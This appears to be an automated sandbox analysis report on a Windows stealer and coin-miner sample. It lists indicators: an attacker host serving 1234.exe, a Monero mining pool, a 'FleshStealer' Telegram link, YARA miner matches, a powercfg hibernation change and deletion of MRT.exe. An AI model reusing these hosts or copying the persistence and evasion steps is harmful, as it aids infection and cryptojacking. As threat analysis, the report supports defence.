              Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
              Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
              Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
              Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
              Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
              Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
              Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
              Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
              Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
              Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
              Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
              Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
              Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
              Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
              Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
              Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
              Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
              Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
              Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
              Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
              Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
              Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
              Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
              Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
              Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
              Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
              Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
              Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
              Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
              Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
              Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
              Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
              Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
              Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
              Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
              Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
              Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
              Source: global trafficHTTP traffic detected: GET /1234.exe HTTP/1.1Host: utka.xyzConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: icanhazip.comConnection: Keep-Alive
              Source: global trafficDNS traffic detected: DNS query: utka.xyz
              Source: global trafficDNS traffic detected: DNS query: pool.hashvault.pro
              Source: global trafficDNS traffic detected: DNS query: icanhazip.com
              Source: global trafficDNS traffic detected: DNS query: 43.97.8.0.in-addr.arpa
              Source: System.exe, 00000000.00000002.295346194625.00000176A0FA4000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295346194625.00000176A054B000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295346194625.00000176A116A000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295346194625.00000176A0CDB000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295346194625.00000176A088E000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295346194625.00000176A132F000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295346194625.00000176A0583000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295346194625.00000176A0744000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
              Source: System.exe, 00000000.00000002.295354346638.00000176A8B82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
              Source: gfqyepapamry.exe, 00000028.00000003.295204672211.00000249E5D10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/ObjectSign.crl0
              Source: gfqyepapamry.exe, 00000028.00000003.295204672211.00000249E5D10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/Root.crl0
              Source: gfqyepapamry.exe, 00000028.00000003.295204672211.00000249E5D10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/RootSignPartners.crl0
              Source: gfqyepapamry.exe, 00000028.00000003.295204672211.00000249E5D10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/primobject.crl0
              Source: System.exe, 00000000.00000002.295339978081.000001768E903000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
              Source: System.exe, 00000000.00000002.295346194625.00000176A0FA4000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295346194625.00000176A054B000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295346194625.00000176A116A000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295346194625.00000176A0CDB000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295346194625.00000176A088E000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295346194625.00000176A132F000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295346194625.00000176A0583000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295346194625.00000176A0744000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.pki.goog/gtsr1/gtsr1.crl0W
              Source: System.exe, 00000000.00000002.295346194625.00000176A0FA4000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295346194625.00000176A054B000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295346194625.00000176A116A000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295346194625.00000176A0CDB000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295346194625.00000176A088E000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295346194625.00000176A132F000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295346194625.00000176A0583000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295346194625.00000176A0744000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
              Source: System.exe, 00000000.00000002.295346194625.00000176A0FA4000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295346194625.00000176A054B000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295346194625.00000176A116A000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295346194625.00000176A0CDB000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295346194625.00000176A088E000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295346194625.00000176A132F000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295346194625.00000176A0583000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295346194625.00000176A0744000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
              Source: System.exe, 00000000.00000002.295346194625.00000176A0FA4000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295346194625.00000176A054B000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295346194625.00000176A116A000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295346194625.00000176A0CDB000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295346194625.00000176A088E000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295346194625.00000176A132F000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295346194625.00000176A0583000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295346194625.00000176A0744000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
              Source: System.exe, 00000000.00000002.295346194625.00000176A0FA4000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295346194625.00000176A054B000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295346194625.00000176A116A000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295346194625.00000176A0CDB000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295346194625.00000176A088E000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295346194625.00000176A132F000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295346194625.00000176A0583000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295346194625.00000176A0744000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl0=
              Source: System.exe, 00000000.00000002.295346194625.00000176A0FA4000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295346194625.00000176A054B000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295346194625.00000176A116A000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295346194625.00000176A0CDB000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295346194625.00000176A088E000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295346194625.00000176A132F000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295346194625.00000176A0583000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295346194625.00000176A0744000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
              Source: System.exe, 00000000.00000002.295340608074.00000176905CF000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295340608074.00000176905DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://icanhazip.com
              Source: System.exe, 00000000.00000002.295340608074.00000176905CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://icanhazip.com/
              Source: System.exe, 00000000.00000002.295340608074.00000176905CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://icanhazip.compZ
              Source: System.exe, 00000000.00000002.295346194625.00000176A0744000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
              Source: System.exe, 00000000.00000002.295346194625.00000176A0FA4000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295346194625.00000176A054B000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295346194625.00000176A116A000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295346194625.00000176A0CDB000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295346194625.00000176A088E000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295346194625.00000176A132F000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295346194625.00000176A0583000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295346194625.00000176A0744000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.pki.goog/gtsr100
              Source: System.exe, 00000000.00000002.295346194625.00000176A0FA4000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295346194625.00000176A054B000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295346194625.00000176A116A000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295346194625.00000176A0CDB000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295346194625.00000176A088E000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295346194625.00000176A132F000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295346194625.00000176A0583000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295346194625.00000176A0744000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
              Source: System.exe, 00000000.00000002.295346194625.00000176A0FA4000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295346194625.00000176A054B000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295346194625.00000176A116A000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295346194625.00000176A0CDB000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295346194625.00000176A088E000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295346194625.00000176A132F000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295346194625.00000176A0583000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295346194625.00000176A0744000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pki.goog/repo/certs/gtsr1.der04
              Source: System.exe, 00000000.00000002.295340608074.0000017690481000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: System.exe, 00000000.00000002.295354346638.00000176A8B82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadis.bm0
              Source: System.exe, 00000000.00000002.295346194625.00000176A0FA4000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295346194625.00000176A054B000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295346194625.00000176A116A000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295346194625.00000176A0CDB000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295346194625.00000176A088E000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295346194625.00000176A132F000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295346194625.00000176A0583000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295346194625.00000176A0744000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
              Source: System.exe, 00000000.00000002.295346194625.00000176A0FA4000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295346194625.00000176A054B000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295346194625.00000176A116A000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295346194625.00000176A0CDB000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295346194625.00000176A088E000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295346194625.00000176A132F000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295346194625.00000176A0583000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295346194625.00000176A0744000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
              Source: System.exe, 00000000.00000002.295346194625.00000176A08B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: System.exe, 00000000.00000002.295346194625.00000176A08B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: System.exe, 00000000.00000002.295346194625.00000176A08B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: System.exe, 00000000.00000002.295346194625.00000176A0809000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295346194625.00000176A07E8000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295346194625.00000176A08CC000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295346194625.00000176A04AE000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295346194625.00000176A08B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: System.exe, 00000000.00000002.295346194625.00000176A08B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: System.exe, 00000000.00000002.295346194625.00000176A08B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gemini.google.com/app?q=
              Source: System.exe, 00000000.00000002.295340608074.0000017690C35000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295340608074.0000017690CBA000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295340608074.0000017690CA0000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295340608074.0000017690C3F000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295359123359.00000176A9478000.00000004.00000020.00020000.00000000.sdmp, System.exe, 00000000.00000002.295359689135.00000176A94E6000.00000004.00000020.00020000.00000000.sdmp, System.exe, 00000000.00000002.295340608074.0000017690C87000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/
              Source: System.exe, 00000000.00000002.295340608074.0000017690CA0000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295340608074.0000017690C3F000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295359123359.00000176A9478000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com//
              Source: System.exe, 00000000.00000002.295340608074.0000017690CA0000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295340608074.0000017690C3F000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295359123359.00000176A9478000.00000004.00000020.00020000.00000000.sdmp, System.exe, 00000000.00000002.295359527952.00000176A9498000.00000004.00000020.00020000.00000000.sdmp, System.exe, 00000000.00000002.295359689135.00000176A94E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/https://login.live.com/
              Source: System.exe, 00000000.00000002.295340608074.0000017690CA0000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295340608074.0000017690C3F000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295359123359.00000176A9478000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/v104
              Source: System.exe, 00000000.00000002.295354346638.00000176A8B82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.com0
              Source: System.exe, 00000000.00000002.295346194625.00000176A0FA4000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295346194625.00000176A054B000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295346194625.00000176A116A000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295346194625.00000176A0CDB000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295346194625.00000176A088E000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295346194625.00000176A132F000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295346194625.00000176A0583000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295346194625.00000176A0744000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pki.goog/repository/0
              Source: System.exe, 00000000.00000002.295340608074.00000176905CF000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295346194625.00000176A1359000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295346194625.00000176A0D05000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295340608074.0000017690547000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295340608074.00000176905DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://t.me/FleshStealer
              Source: System.exe, 00000000.00000002.295340608074.00000176905CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://t.me/FleshStealerpZ
              Source: System.exe, 00000000.00000002.295359571793.00000176A94AC000.00000004.00000020.00020000.00000000.sdmp, System.exe, 00000000.00000002.295346194625.00000176A0809000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295346194625.00000176A07E8000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295346194625.00000176A08CC000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295346194625.00000176A04AE000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295346194625.00000176A08B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uk.search.yahoo.com/favicon.icohttps://uk.search.yahoo.com/search
              Source: System.exe, 00000000.00000002.295346194625.00000176A0809000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295346194625.00000176A07E8000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295346194625.00000176A08CC000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295346194625.00000176A04AE000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295346194625.00000176A08B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uk.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: System.exe, 00000000.00000002.295340608074.0000017690481000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://utka.xyz
              Source: System.exe, 00000000.00000002.295340608074.0000017690481000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://utka.xyz/1234.exe
              Source: System.exe, 00000000.00000002.295346194625.00000176A0FA4000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295346194625.00000176A054B000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295346194625.00000176A116A000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295346194625.00000176A0CDB000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295346194625.00000176A088E000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295346194625.00000176A132F000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295346194625.00000176A0583000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295346194625.00000176A0744000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.digicert.com/CPS0
              Source: System.exe, 00000000.00000002.295346194625.00000176A0809000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295346194625.00000176A07E8000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295346194625.00000176A08B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
              Source: System.exe, 00000000.00000002.295340608074.0000017690547000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
              Source: System.exe, 00000000.00000002.295346194625.00000176A0809000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295346194625.00000176A07E8000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295346194625.00000176A08B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
              Source: System.exe, 00000000.00000002.295346194625.00000176A08CC000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000000.00000002.295346194625.00000176A04AE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
              Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
              Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
              Source: unknownHTTPS traffic detected: 191.101.104.168:443 -> 192.168.11.20:49759 version: TLS 1.2

              System Summary

              barindex
              Malicious sample detected (through community Yara rule)
              Source: 65.2.svchost.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: Detects coinmining malware Author: ditekSHen
              Source: 65.2.svchost.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
              Source: 65.2.svchost.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
              Source: 00000041.00000002.296341625533.0000000140001000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
              Uses powercfg.exe to modify the power settings
              Source: C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
              Source: C:\Windows\System32\svchost.exeProcess Stats: CPU usage > 6%
              Source: C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exeCode function: 2_2_00007FF73FD21394 NtUnlockFile,2_2_00007FF73FD21394
              Source: C:\ProgramData\rpsbjgoyhvql\gfqyepapamry.exeCode function: 40_2_00007FF7938D1394 NtAllocateVirtualMemoryEx,40_2_00007FF7938D1394
              Source: C:\Windows\System32\conhost.exeCode function: 63_2_0000000140001394 NtQueryOpenSubKeys,63_2_0000000140001394
              Source: C:\ProgramData\rpsbjgoyhvql\gfqyepapamry.exeFile created: C:\Windows\TEMP\ubgiupusihqd.sys
              Source: C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exeFile deleted: C:\Windows\System32\MRT.exeJump to behavior
              Source: C:\Users\user\Desktop\System.exeCode function: 0_2_00007FFAC2AFAF460_2_00007FFAC2AFAF46
              Source: C:\Users\user\Desktop\System.exeCode function: 0_2_00007FFAC2AFF14F0_2_00007FFAC2AFF14F
              Source: C:\Users\user\Desktop\System.exeCode function: 0_2_00007FFAC2AFBCF20_2_00007FFAC2AFBCF2
              Source: C:\Users\user\Desktop\System.exeCode function: 0_2_00007FFAC2AF0E6D0_2_00007FFAC2AF0E6D
              Source: C:\Users\user\Desktop\System.exeCode function: 0_2_00007FFAC2B0F9F80_2_00007FFAC2B0F9F8
              Source: C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exeCode function: 2_2_00007FF73FD265502_2_00007FF73FD26550
              Source: C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exeCode function: 2_2_00007FF73FD265502_2_00007FF73FD26550
              Source: C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exeCode function: 2_2_00007FF73FD265502_2_00007FF73FD26550
              Source: C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exeCode function: 2_2_00007FF73FD265502_2_00007FF73FD26550
              Source: C:\ProgramData\rpsbjgoyhvql\gfqyepapamry.exeCode function: 40_2_00007FF7938D655040_2_00007FF7938D6550
              Source: C:\ProgramData\rpsbjgoyhvql\gfqyepapamry.exeCode function: 40_2_00007FF7938D655040_2_00007FF7938D6550
              Source: C:\ProgramData\rpsbjgoyhvql\gfqyepapamry.exeCode function: 40_2_00007FF7938D655040_2_00007FF7938D6550
              Source: C:\ProgramData\rpsbjgoyhvql\gfqyepapamry.exeCode function: 40_2_00007FF7938D655040_2_00007FF7938D6550
              Source: C:\Windows\System32\conhost.exeCode function: 63_2_000000014000315063_2_0000000140003150
              Source: C:\Windows\System32\conhost.exeCode function: 63_2_00000001400026E063_2_00000001400026E0
              Source: Joe Sandbox ViewDropped File: C:\ProgramData\rpsbjgoyhvql\gfqyepapamry.exe 52C8C92F79183A354C5EE59653426B0F97209C37EEC39FE5077EF43666EAF8A1
              Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exe 52C8C92F79183A354C5EE59653426B0F97209C37EEC39FE5077EF43666EAF8A1
              Source: C:\ProgramData\rpsbjgoyhvql\gfqyepapamry.exeCode function: String function: 00007FF7938D1394 appears 33 times
              Source: C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exeCode function: String function: 00007FF73FD21394 appears 33 times
              Source: 65.2.svchost.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
              Source: 65.2.svchost.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
              Source: 65.2.svchost.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
              Source: 00000041.00000002.296341625533.0000000140001000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
